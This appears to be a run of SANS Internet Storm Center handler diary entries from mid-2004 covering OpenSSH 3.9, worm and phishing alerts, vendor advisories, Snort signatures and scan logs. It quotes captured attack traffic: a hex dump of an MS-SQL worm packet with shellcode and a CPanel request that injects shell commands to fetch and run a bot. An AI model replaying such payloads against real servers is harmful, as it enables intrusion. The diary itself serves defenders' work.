OpenSSH 3.9 has just been released. According to information available regarding this release there are several changes since version 3.8.

* Added new "IdentitiesOnly" option to ssh(1), which specifies that it
should use keys specified in ssh_config, rather than any keys in ssh agent(1)

* Make sshd(8) re-execute itself on accepting a new connection. This
security measure ensures that all execute-time randomisations are
reapplied for each connection rather than once, for the master
process' lifetime. This includes mmap and malloc mappings, shared
library addressing, shared library mapping order, ProPolice and
StackGhost cookies on systems that support such things

* Add strict permission and ownership checks to programs reading
~/.ssh/config NB ssh(1) will now exit instead of trying to process a
config with poor ownership or permissions

* Implemented the ability to pass selected environment variables
between the client and the server. See "AcceptEnv" in sshd_config(5)
and "SendEnv" in ssh_config(5) for details

* Added a "MaxAuthTries" option to sshd(8), allowing control over the
maximum number of authentication attempts permitted per connection

* Added support for cancellation of active remote port forwarding
sessions. This may be performed using the ~C escape character,
see "Escape Characters" in ssh(1) for details

* Many sftp(1) interface improvements, including greatly enhanced "ls"
support and the ability to cancel active transfers using SIGINT (^C)

* Implement session multiplexing: a single ssh(1) connection can now
carry multiple login/command/file transfer sessions. Refer to
the "ControlMaster" and "ControlPath" options in ssh_config(5) for
more information

* The sftp-server has improved support for non-POSIX filesystems (e.g.

* Portable OpenSSH: Re-introduce support for PAM password
authentication, in addition to the keyboard-interactive driver. PAM
password authentication is less flexible, and doesn't support pre-
authentication password expiry but runs in-process so Kerberos
tokens, etc are retained

Thanks to Donald Smith for providing us with the following information overview:

Of these 1,2,3,4 and 10 are all security related. With 1,2,3 and 4 being
issues that were considered by many to be minor security flaws in

Pam was pulled when there were some issues with pam libraries that led
to a potential vulnerability in openssh.

Portable OpenSSH 3.7.1p2 and newer are not vulnerable to "September 23,
2003: Portable OpenSSH Multiple PAM vulnerabilities", OpenSSH Security
Advisory. (This issue does not affect OpenBSD versions)


Rumors of new Download.Ject Worm

We have heard rumors that there maybe a new worm on the loose. Reports have stated that this worm arrives as an innoculous looking instant message on AIM or ICQ which says "My personal home page http://XXXXXXX.X-XXXXXX.XXX/". Once the user clicks on this link Internet Explorer opens a malicious website that infects the user through several IE vulnerabilities such as Object Data, Ibiza CHM and MHTML Redirect.

The most noticeable end-user effects of being infected with this new Download.Ject worm is a modifed Homepage and search pane in the browser. In place of the users ordinary Homepage is a site called TargetSearch and several browser windows displaying adult advertisement and referal links. There are obvious financial motivations behind this worm.

Please let the Handler's know if anyone has received an actual copy of this.

SEC Warning about Telephone Fraud Scam

It appears there is yet another scam trying to take our hard earned dollars from our hands. This time the technology that is being used to scam is the telephone. According to the Securities and Exchange Commission says that the message is designed to sound as if the speaker didn't realize that he or she was leaving the hot tip on the wrong machine. The message is intended to lead you to believe that there is a stock that is going to drastically increase in value and that you could make a huge profit. In reality, the only one making the huge profit will be the scammers. To read the full story and find out how to report this scam should you receive one of these calls see the Securities and Exchange Commission web site.


My Favorite Quote of the Day

Thanks to Donald Smith for my favorite quote of the day.

Everyday is virus day.
Do you know where your recovery CDs are?
Did you create them yet?
Deb Hale

Handler On Duty



Published: 2004-08-19

Spyware Tool Kit, OSPF Filtering & Authentication, Port 559 Traffic Spike

Anti-Spyware Tool Kit

Yesterday's diary entry solicited a number of replies regarding the "tool kits" people use for fighting spyware, malware and viruses. I've collated the most popular, from both e-mail submissions and some from the Handlers themselves. This list is not necessarily complete in anyway...just a starter for people to help build their own kit.


Spybot - Search & Destroy : http://security.kolla.de/ or http://www.safer-networking.org
Ad-Aware: http://www.lavasoftusa.com/software/adaware/
SwatIt: http://www.swatit.org
TDS-3 - Trojan Defence Suite http://tds.diamondcs.com.au/
TrojanHunter: http://www.misec.net/trojanhunter
TheCleaner: http://www.moosoft.com/
BHOdemon http://www.spychecker.com/download/download_bhodaemon.html
SpySweeper: http://www.webroot.com/
Process Explorer http://www.sysinternals.com/
HijackThis http://www.spywareinfo.com/~merijn/
AntiVir: http://www.free-av.com/
AVG: http://www.grisoft.com/us/us_index.php


Rogue/Suspect Anti-Spyware Products & Web Sites: http://www.spywarewarrior.com/rogue_anti-spyware.htm
Broadband Reports (aka DSL Reports): http://www.dslreports.com/forum/security,1

Please note, some or all of these tools are NOT for the novice, and should be used with GREAT care. If you are not careful, you may damage parts of your operating system.

OSPF Filtering & Authentication

Yesterday, Cisco released an advisory regarding a vulnerability in their OSPF implementation that could result in a DOS of a router. The notice also provided links to updated software that should resolve the issue. However, there are a number of SOPs (standard operating procedures) that router admins should be following that will also help mitigate this situation. In the case of OSPF, the protocol should be filtered at your borders, if possible, running only on "internal" interfaces, and authentication should be required. The following are links that should get you started:

Cisco Sample Configuration: http://www.cisco.com/warp/public/104/25.shtml
Another Sample Configuration: http://www.tech-recipes.com/cisco_router_tips408.html
Port 559 Scanning, Request for Packets

We have noted a marked increase in Port 559 scanning. This port may be related to the Domwis backdoor. Please submit any packet captures for this port to http://isc.sans.org/contact.php

More information here:


Handler-on-Duty: Dave Brookshire <dsb AT rlx DOT com>


Published: 2004-08-18

Updated Acrobat Snort Sig / Cisco Advisory / Distributed Vulnerable Scripts Scans/ Diary Foot-note

Acrobat Snort Sig

We received a note that BleedingSnort posted a Snort sig for the acrobat vulnerability:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Adobe Acrobat Reader Malicious URL Null Byte"; reference:url,idefense.com/application/poi/display?id=126&type=vulnerabilities; uricontent:".pdf%00"; classtype:attempted-admin; sid:2002001; rev:2;)


Please use the following rule for the Adobe Acrobat Vulnerability:

(msg:"BLEEDING-EDGE Adobe Acrobat Reader Malicious URL Null Byte";
flow:to_server,established; uricontent:".pdf|00|"; nocase;
reference:cve,2004-0629; classtype:web-application-attack; sid:2002001;
Reference and Updates at: http://www.bleedingsnort.com
Cisco Security Advisory: Cisco IOS Malformed OSPF Packet Causes Reload

Cisco just released a Security Advisory about a possible DoS condition in Cisco devices that have OSPF enabled.
According to Cisco:

"A Cisco device running Internetwork Operating System (IOS) ® and enabled for the Open Shortest Path First (OSPF) protocol is vulnerable to a Denial of Service (DoS) attack from a malformed OSPF packet. The OSPF protocol is not enabled by default.

The vulnerability is only present in Cisco IOS release trains based on 12.0S, 12.2, and 12.3. Releases based on 12.0, 12.1 mainlines, and all Cisco IOS images prior to 12.0 are not affected.

Cisco has made free software available to address this vulnerability.

There are workarounds available to mitigate the effects."


More distributed Scans

We received more logs from what looks like a distribuited scan for vulnerable scripts.

You can find an excerpt bellow:

[Mon Aug 16 07:05:40 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/mail.cgi

[Mon Aug 16 07:05:39 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/FormMail.pl

[Mon Aug 16 07:05:34 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/formmail.cgi

[Mon Aug 16 07:05:23 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/mailform.pl

[Mon Aug 16 07:05:20 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/contact.cgi

[Mon Aug 16 07:05:19 2004] [error] [client] script not found or unable to stat: /yyyyyy/xxxxx/public_html/cgi-bin/formmail.pl

Diary foot-note

If do you ever had problems with spywares and related, be careful when choosing the right tools. The worst thing is that if you have a spyware in your computer, a lot of Anti-spywares tools pop-ups will appear in your window, offering the products. Be very very careful...!

I usually have a set of tools that I trust to clean up a computer, as many of you. So, if you are in doubt, drop us a line.


Olympic games 2004 status: Brazil - 2 bronze medals

Handler on Duty: Pedro Bueno (bueno/AT/ieee.org)


Published: 2004-08-17

Acrobat Reader Vulnerabilities - FreeBSD Security Benchmark - Phishing Season

Acrobat Reader Buffer Overflows - Linux/Windows command execution

iDEFENSE has released two advisories regarding vulnerabilities in Adobe's Acrobat Reader software. The first is in the Acrobat Reader for UNIX systems, and allows arbitrary code execution via a buffer overflow in the handling of uuencoded documents.


The second is a buffer overflow in the ActiveX component of Acrobat Reader for Windows. This vulnerability poses a much greater threat, for a number of reasons. First, according to the iDEFENSE, the overflow is still present in current releases of Acrobat Reader. Secondly, the number of target systems is much greater than for the UNIX Acrobat Reader vulnerability. Finally, and most importantly, the advisory contains what is essentially an roadmap for any would-be exploit developer.


FreeBSD Security Benchmark

CIS has released a benchmark for the FreeBSD operating systems, which is, according to the site, "intended for FreeBSD versions 4.8 and later." I believe this means FreeBSD 4.8-4.10 (Production) and does *NOT* include the 5.x series, which is still currently a "new technology release."


UPDATE: Mark your calendars, true believers. I was wrong! According to CISecurity's John Banghart, the benchmark has been tested on FreeBSD 4.8 and 5.2.

Phishing Season

ISC reader Brandon Noble sent in the following:

"Quite a few people think they could NEVER get caught in one of these phishing scams. The truth is that the social engineering is very good.

Some of your readers may benefit from this little phishing test from Mail Frontier."


I took the test myself, and found it to be a fairly accurate sampling of common purely email-based phishing lures found in the wild - however, keep in mind that the quiz is the product of an anti-phishing product. Unfortunately, phishermen (phisherpersons?) are upping the ante, and using browser-specific spoofing vulnerabilities to increase the apparent authenticity* of their schemes. On that note, the prolific Liu Die Yu has discovered Yet Another Internet Explorer Spoofing Vulnerability. The gory details (and a proof of concept test) are available at the URL below.


In a discussion of anti-spoofing capabilities on the ISC mailing list, handler George Bakos pointed out the free anti-spoofing tool Spoofstick. Spoofstick is a browser extension for IE and Firefox that simply displays the current domain name. This is a simple yet elegant solution to many of the spoofing attacks currently employed by phishing sites. For more information (and to download the Spoofstick) head to the following URL.


UPDATE: Several ISC readers have noted that SpoofStick currently fails to display the correct domain for the most recent IE spoofing attack as implemented in the aforementiond Secunia proof-of-concept. I am in contact with Corestreet in an attempt to rectify this.

UPDATE: Within two hours of contacting Corestreet the ISC received the following communcation from Phil Libin, Corestreet's president:

SpoofStick for IE v. 1.02 (available from our website as of about an hour
ago) fixes exactly this bug.

Cory Altheide



*I was going to say "decrease the phishiness" instead of "increase the apparent authenticity" but I'm willing to bet that ISC's audience had pretty much had their fill of cute perversions of "phishing" by the middle of the paragraph in question.


Published: 2004-08-16

Still More MyDoom, a Few Twists on IDS, and a New Phishing Threat

Today's Highlights -

- Mydoom.s, yet another MyDoom variant

- Virus detection with Snort

- Switch Port Monitoring

- A New Twist to Phishing Reported

Mydoom.s, yet another MyDoom variant

Conrad Longmore brought to our attention there's yet another new mydoom variant.
The MyDoom variant "MyDoom.S" is being spread en masse this Monday. Suggested is that it might be spread using a bot network created by the previous variant of the MyDoom worm.

The attachment seems to be named "photos_arc.exe".

- update your favorite anti-virus package

- educate your users not to click on attachments

Some URLs:


[by Swa Frantzen, standing in for George]

Mydoom.s detection with Snort

For those feeling brave, there are bleeding edge Snort rules availble to detect this latest variant at: http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/Stable/WORM_MyDoom.S?rev=1.2&content-type=text/vnd.viewcvs-markup
Thanks to Matt Jonkman for submitting that.

Speaking of Snort, viruses (virii?), and bleeding edge - Will Metcalf has put together a ClamAV preprocessor module for Snort, to alert on network traffic containing code that fires a Clam virus signature:

Switch Port Monitoring

A couple of days ago, I advised someone to monitor switch port activity for indications of unusual activity. For example, seeing a higher than usual frames-per-second count from a host during the wee hours may indicate a host is scanning or serving files. An unusually high number heading to a host may indicate a sniffer, etc. Andy Cuff of Talisker has put together a nice list of config settings for popular switches to make this a little easier:

A New Twist to Phishing Reported

Dan Hubbard of Websense has reported a new trend in phishing:

We are starting to see more and more phishing sites which are not targeting specific financial institutes but are targeting general ecommerce. We have seen "fake" online banks, sporting good stores, and pharmacy's.


* no contact information

* no domain name

* many hosted in China or S Korea.

* no secure ordering process

* reported by thousands of spam engines

Report any phishing attempts you receive to:

Constant vigilance!

--Alastor Moody, Harry Potter and the Goblet of Fire


Published: 2004-08-14

New Ethereal released; A different Kind of Storm Center

New Ethereal released

The new Ethereal supports x.509 protocols now, there are no security fixes in this release.

Packetyzer was also updated recently. It supports Ethereal’s packet capture format and offers a bit more support for wireless captures. The extra feature that sets Packetyzer apart from ethereal is its playback function. You can edit the captured packet and then replay it on the wire. The TCP flow view option is particularly helpful in illustrating how protocols work.
A different Kind of Storm Center

The SANS Internet Storm Center sticker is proudly displayed on my cube at the office. I place threat announcements that affect the general user at the office. The other column has the American Red Cross’ daily disaster report (when not keeping an eye on the Internet, I play disaster responder with the ARC.) This week is a rather busy week for the ARC so my cube is covered with satellite photos and storm path predictions of Bonnie and Charlie. So many graphics that they’ve pushed out the regular ISC announcements, and now the Internet Storm Center sign is taking on double duties.
It’s rare that we get the request on the handlers list, but for those of you looking for Meteorological data and analysis I offer these links:

The Hurricane Watch Net:

Reports of current storm activity in the United States:

Output from the Storm Prediction Center, again for the United States:
Kevin Liston
kliston at greenman-consulting dot com


Published: 2004-08-13

GAIM buffer overflow, Aitel paper and more XP SP2

GAIM buffer overflow, Aitel paper and more XP SP2

Gaim Unspecified MSN Protocol Buffer Overflow Vulnerabilities

Multiple Linux distributions released an update for GAIM, an instant messenger suite, to fix a buffer overflow in the MSN IM Protocol handler. While we havent seen this vulnerability being exploited in the wild, this appears to be an interesting trend for a research project.

The concept of 'honey sticks' or similar has been tossed around on mailing lists for a while. Take a vulnerable client (MS IE, or GAIM, or a vulnerable IRC client) and connect to multiple sites to see if they compromise the machine through client access. I heard of a University research project where they were taking snapshots of Windows 2000 boxes with vulnerable Internet Explorer browsers and connecting to thousands of sites polled from search engines and phishing scams. It should be quite interesting to see the fruits of these research projects.

XP Service Pack 2 continues to provide fodder for all sides (pro and con).

One one side, we feel as a whole it provides better security (personal firewall turned on by default, end of support for most named raw sockets, etc) and on the other we have heard many downsides to the ill effects
of SP2.

Johannes put up a page summarizing the initial experience with XP SP2. This can be found here:


Dave Aitel, from Immunitysec just published a research paper titled: "Microsoft Windows, a lower Total Cost of Ownership" located at:


Note that it is 0wnership with a Zero in the above title. The paper is sure to stir up the waters a tad.

Scanning trends continue with 445 leading the pack. There have been a number of attacks against MS-SQL resurfacing, one example from earlier this evening posted below. These are old exploits, old vulnerabilities, and machines that have been 0wn3ed for quite sometime. DBA's, patch thy systems!


21:39:30.585849 > foo.foo.foo.104.1434: [udp sum ok] udp 376
(ttl 112, id 18373, len 404)
0x0000 4500 0194 47c5 0000 7011 1d05 3d17 3f69 E...G...p...=.?i
0x0010 xxxx xx68 04a1 059a 0180 4c1b 0401 0101 B.%h......L.....
0x0020 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0030 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0040 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0050 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0060 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0070 0101 0101 0101 0101 0101 0101 01dc c9b0 ................
0x0080 42eb 0e01 0101 0101 0101 70ae 4201 70ae B.........p.B.p.
0x0090 4290 9090 9090 9090 9068 dcc9 b042 b801 B........h...B..
0x00a0 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1...P..5....P
0x00b0 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 ..Qh.dllhel32hke
0x00c0 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
0x00d0 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf.llQh32.dhws2
0x00e0 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f.etQhsockf.toQ
0x00f0 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend....B.E.P..
0x0100 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.E.P.E.P..P....
0x0110 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U..Qt.....
0x0120 42ff 16ff d031 c951 5150 81f1 0301 049b B....1.QQP......
0x0130 81f1 0101 0101 518d 45cc 508b 45c0 50ff ......Q.E.P.E.P.
0x0140 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j...P.E.P.E
0x0150 c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 .P........<a...E
0x0160 b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ...@...........)
0x0170 c28d 0490 01d8 8945 b46a 108d 45b0 5031 .......E.j..E.P1
0x0180 c951 6681 f178 0151 8d45 0350 8b45 ac50 .Qf..x.Q.E.P.E.P
0x0190 ffd6 ebca ....

[**] [1:2050:5] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/12-21:39:30.585849 -> xx.xx.xx.104:1434
UDP TTL:112 TOS:0x0 ID:18373 IpLen:20 DgmLen:404
Len: 376

[Xref => http://cgi.nessus.org/plugins/dump.php3?id=10674]
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649]
[Xref => http://www.securityfocus.com/bid/5310]

Dont forget to check out Dshield and learn how you too can begin to submit sanitized logs and get your own report page. To find out more, visit:


Make use of the ISC data. You can run searches, view trends and gather reports from the following URL's:



Mike Poor

< -- mike [at] intelguardians.com -- >

Handler on Duty signing off



Published: 2004-08-12

SP2 breaks nmap, others - *Anti*phishing - Application exploits

nmap non-functional under XP SP2

The extremely popular port-scanner "nmap" became an early victim of XP SP2 today when Fyodor, nmap's author, announced that the tool does not function under Windows XP Service Pack 2. This is due to the removal of XP's innate ability to send TCP packets over "raw" sockets. This is likely a temporary situation, as nmap is fully functional on platforms without native raw socket support.


Remember, we're still sharing our SP2 experiences at the following link:


Antiphishing.org report for June

Since it wouldn't be a proper handler's diary without something phishing related ... Antiphishing.org has released their monthly report outlining which companies were targeted by fishing attacks the most often, which countries hosted the most phishing sites, the average lifespan of a phishing hole, and many more interesting findings.*


CPanel Exploits

One of our handlers caught an attempted CPanel exploit in his honeynet, and posed a request for additional CPanel exploit traffic. Here's what the handler saw:

GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}
\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0

followed by the execution:

GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0

I'd like to extend the request to include all kinds of application level attacks. As we slowly but surely develop defenses against the classical stack-smashing attacks (and hopefully begin coding in such a way where they become irrelevant), application level attacks will become increasingly profitable to the attacker. Besides the (usually) softer target, application attacks have the added benefit of frequently slipping past the classical perimeter defense mechanisms of traditional IDS and firewalls. Furthermore, by popping a service and rooting a box, the attacker simply owns the box - but, if the attacker can successfully exploit application level flaws, he or she can own the *data*, which more often than not is a much more valuable prize.


Cory Altheide

Handler on Duty


*Just to clarify, I mean that there are many more findings that are interesting, not many other findings that are more interesting than the ones I've mentioned already. I really wish the English language allowed for the use of parenthesis in the manner algebra does = (many more) (interesting findings) vs. many (more interesting findings).


Published: 2004-08-11

Libpng exploit / XP SP2 yet / New MyDoom? / More phishing / ISC Webcast / Corporate Policy

Libpng Exploit

A post today at Bugtraq Mailing List shows what suppose to be an exploit for Libpng vulnerability released a few days ago.

Reference: http://isc.sans.org/diary.php?date=2004-08-04

XP SP2 yet...

So, did you survive to the day after XP SP2? Share your experience with us at http://isc.sans.org/xpsp2.php .

Microsoft released a document with Top 10 reasons to deploy SP2. Deploy or not? Check it here? http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2top.mspx

New MyDoom ?

We received two posts asking if we were aware of a New MyDoom variant. According to the posts, the new variant would be spreading over China and would in wild in the next hours. We are not aware of any new worm variant. (YET).

More phishing

More and more phishings everyday. The example bellow was sent by Ryan Barnett. It is a phishing for UsBank and uses two techniques to obfuscate the fake urls:


Decoded -


Decoded -

SANS ISC Webcast

Did you miss todays ISC Webcast? Check the archive at: http://www.sans.org/webcasts/show.php?webcastid=90491

Corporate Policy...

Today you will have something extra to watch. Microsoft official MSN Messenger was released. If your corporate policy says that users are not allowed to use IM and you are already blocking the clients, watch out Web based IM. It may bypass some IM filters and allow them in your network.

Some Web Based are well known, as msn2go.com, msn2go.com.br...and now http://webmessenger.msn.com/ . Good luck...!


Handler on Duty: Pedro Bueno (bueno/AT/ieee.org)


Published: 2004-08-10

Windows XP SP2 Experience Forum / Exchange 5.5 Security Bulletin / Mac OS X Bulletins

Special Note: Internet Storm Center Webcast

Today (Wednesday) at 14:00 EST / 20:00 CEST. For details, see

Note that this webcast will start one hour later then most of our
other SANS webcasts.
Windows XP SP2 Experience Forum

Windows XP Service Pack 2 was officially released to the world yesterday (as noted in yesterday's Handlers Diary and numerous other trade magazines and websites). While most users should not have significant problems with SP2, others stumble upon cases where home grown web applications or other 3rd party software may not work properly after installation. The Internet Storm Center has set up a forum to collect the experiences of others in the security community. It is the hope of the ISC that users will be able to share information on problems they have encountered and/or steps they used to help remedy these issues. If you would like to submit your experiences, please see the following URL:

Microsoft Exchange 5.5 Security Bulletin (MS04-026)

Today is the regularly scheduled Microsoft Patch Day. While most people are focused on Windows XP SP2, those that are using Exchange 5.5 need to take heed of today's security bulletin. An update was released today to resolve a problem within the Outlook Web Access service of Exchange version 5.5 involving cross-site scripting and the ability of an attacker to convince users to run malicious scripts. Though the bulletin rates the severity of the exposure as only Moderate, it is still a wise idea to patch your Outlook 5.5 Servers at the nearest maintenance time administrators have available. There are plenty of "click-happy" end-users that could create some headaches to many administrators if attackers start using this vulnerability in junk or malicious email. Also, continue to try to raise security awareness when it comes to those clicking on links or attachments without regard. For more technical information on the vulnerability and available patch, please see the following URL:

Apple Mac OS X Bulletins (APPLE-SA-2004-08-09)

Yesterday, two bulletins were released by Apple. The first bulletin involved the libpng (Portable Network Graphics) vulnerability that has been in numerous patches in the Unix and Linux world in the past 2 weeks. The Mac OS X CoreGraphics and AppKit frameworks have been updated to protect against the flaws in the reference library. The software update is available for these versions of OS X:
* Mac OS X v10.3.4 "Panther"

* Mac OS X Server v10.3.4 "Panther"

* Mac OS X v10.2.8 "Jaguar"

* Mac OS X Server v10.2.8 "Jaguar"
The second bulletin announced the availability of Mac OS X v 10.3.5. The new version of OS X includes the patch for libpng, and also includes security updates for the Safari Web Browser and the TCP/IP stack (the rose fragmentation attack).
For more information on either of these, please see the following URLs:



Scott Fendley - Handler on Duty

University of Arkansas

scottf /at/ uark /dot/ edu


Published: 2004-08-09

New Bagle Variant Spreading

New Bagle Variant Spreading

There is a new Bagle mass-mailing virus variant on the loose.

Attachment may contain one of the following file names,









According to handler Tom Liston, the virus installs itself as C:\WINDOWS\System32\WINdirect.exe and runs from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win_upd2.exe


The virus download part of itself from a list of known websites. Blocking the following site at your perimeter can mitigate the risk of this virus


AV vendors have created signatures for this Bagle variant.

Mcafee: Bagle.aq

Trendmicro: Bagle.ac

Symantec: Bagle.ao

Snort signature for this virus is also available on Bleeding Snort (submitted by Matt Jonkman). http://www.bleedingsnort.com

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Bagle Variant Requesting 2.jpg"; reference:url,http.isc.sans.org/diary.php?date=2004-08-09; content:"GET /2.jpg"; sid:2001061; rev:3;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Bagle Variant Checking In"; reference:url,vil.nai.com/vil/content/v_127423.htm; uricontent:"/spyware.php"; sid:2001064; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 25 (msg:"BLEEDING-EDGE VIRUS Possible Bagle.AQ Worm Outbound"; content:"filename="; pcre:"m/(price2|new_price|08_price|newprice|new_price|price_new|price|price_08).zip/"; nocase; sid:2001065; rev:1;)
Microsoft Windows XP SP2 is out!

Microsoft has release Service Pack 2 for Windows XP. It not only is a cumculative patch for XP, but also add additional functionalities to Windows XP, this include many security features (such as firewall, IE security)

For the new features:


Information on SP2:

AOL Instant Messenger URI Handler Buffer Overflow

A vulnerability exists in AIM, it is caused by a stack based buffer overflow in the handling of "away" messages. Successful exploitation allows malicious code to be run on the user's system.

The vulnerability has been confirmed in version 5.5.3595. Other versions may also be affected. Mitigation includes upgrading to the latest beta version of AIM software or to use the workaround posted on www.aim.com




Jason Lam, jason /at/ networksec.org


Published: 2004-08-08

Mixed bag for a quiet Sunday


Since today was a pretty quiet day, I'm going to take the opportunity to share a few random thoughts. I saw a presentation the other day on some uses of Google for, shall we say, nefarious purposes. While the search engines are very useful, they can be useful to the "bad guys", too. The recent worms that took advantage of various search engines are only the tip of the iceberg. One of the things that this did remind me of, though, was to be careful about what information about you appears on web sites that can be indexed by the various search engines.

A new book

Second, I've just started reading a new book, _The Tao of Network Security Monitoring_ by Richard Bejtlich, a computer security professional who is well-known to many of the handlers (I had the pleasure of attending SANS 2000 and SANSFIRE 2001 with him, though I'm sure he doesn't remember me). So far, it looks pretty interesting, I may include more of a report on it when I finish.


We, the handlers at the Internet Storm Center, could not do what we do without the continued support of the thousands of you out there who submit your logs to Dshield. As always, if you haven't been contributing, we urge you to consider it. See

http://www.dshield.org/howto.php .


The next major SANS conference is NS2004 in Las Vegas 29 Sept-4 Oct. The early bird discount deadline is 18 August. There will be 17 tracks and a number of evening, one- and two-day classes all led by some of the best SANS faculty including a number of handlers and some of the rest of us will be there as participants. I look forward to seeing some of you there.


Jim Clausing, jim.clausing/at/acm.org


Published: 2004-08-07

Mailbag; Upgrade Mozilla Products; Reading Corner


We continue to receive submission on SSH brute force scan. From one of the submission received, the source is a public website and the the phpinfo() details can be viewed. This is a bad move as you are allowing others to see, not only the php configuration, but also some of the softwares and their version installed on the system. This file should be removed when you have verified the php is installed properly. We have informed the site to investigate.

Upgrade Mozilla Products

Mozilla has released new version for its products against the libpng vulnerability. If you are using Mozilla products, do upgrade them over the weekend:


To know more details on libpng vulnerability, please refer to:

Reading Corner

NIST has published a draft guidelines on PDA Forensics. Over the weekend, you may want to take a look:



Published: 2004-08-06

XP SP2 Release to manufacturing, and Continued Scanning Trends

XP SP2 Release to manufacturing, and Continued Scanning Trends

SSH Scans continue searching out machines with default and weak password schemas. Below is a url to a post demonstrating what can happen once these brute force attempts are successful.


Microsoft XP SP2 released to Manufacturing.

Microsoft released XP SP2 to Manufacturing today, paving the way to public release at the end of the month. This Service Pack has been available in beta form for a good while already, with mixed reviews. While there are many security fixes in this update, one of the main improvements is that the Windows Personal Firewall will be turned on by default. This does not change the fact that the firewall assumes that if you have an open port, you expect to have that port open on the firewall :-(


According to Microsofts web site, XP SP2 is scheduled to be released this month:

Aug 2, 2004: Windows XP SP 2 Release Candidate 2 (RC2) Removed from the Web

This signifies the end of the pre-release distribution program in
anticipation of the final release of SP2. Windows XP SP2 remains on
schedule for release this month.

We recommend that you not install the RC2 version of SP2 on computers that
are running the latest security updates. Instead, install the final version
of Windows XP SP2 when it becomes available. Installing the RC2 version of
SP2 on computers that already have the latest security updates installed
can cause incompatibilities. The final release of SP2 will be compatible
with all previously installed security updates.

SSH Scans, Microsoft Ports, and Botnet Scans in continuous mode

There have been spikes in port 2745 traffic over the last couple of days. This is a common backdoor from bagle.E and its variants. This increase may be due to continued infection, or bots scanning for the backdoor left by the various malware. Again, quoting the great Tom Liston... 2004 has been a malware festival!


I also continue to see botnet scans for M$ ports, as well as the usual bagle, mydoom, sasser, dabber and other ports. Examples below: > FOO.FOO.104
21:32:54.748297 > FOO.FOO.104.135: S 1874993687:1874993687(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:54.775112 > FOO.FOO.104.135: S 1875076752:1875076752(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:54.840363 > FOO.FOO.104.1025: S 1875133493:1875133493(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:54.871901 > FOO.FOO.104.1025: S 1875169154:1875169154(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.155331 > FOO.FOO.104.445: S 1875355067:1875355067(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.206019 > FOO.FOO.104.6129: S 1875668180:1875668180(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.210355 > FOO.FOO.104.139: S 1875721323:1875721323(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.216125 > FOO.FOO.104.135: S 1875076752:1875076752(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.221793 > FOO.FOO.104.135: S 1874993687:1874993687(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.445722 > FOO.FOO.104.1025: S 1875133493:1875133493(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.448958 > FOO.FOO.104.1025: S 1875169154:1875169154(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.759457 > FOO.FOO.104.6129: S 1875668180:1875668180(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.763985 > FOO.FOO.104.139: S 1875721323:1875721323(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.769704 > FOO.FOO.104.135: S 1875076752:1875076752(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.775256 > FOO.FOO.104.445: S 1875355067:1875355067(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:55.930484 > FOO.FOO.104.135: S 1874993687:1874993687(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:56.110472 > FOO.FOO.104.1025: S 1875133493:1875133493(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:56.192764 > FOO.FOO.104.139: S 1875721323:1875721323(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:56.200454 > FOO.FOO.104.6129: S 1875668180:1875668180(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
21:32:57.836363 > FOO.FOO.104.445: S 1875232866:1875232866(0) win 16384 <mss 1440,nop,nop,sackOK> (DF)
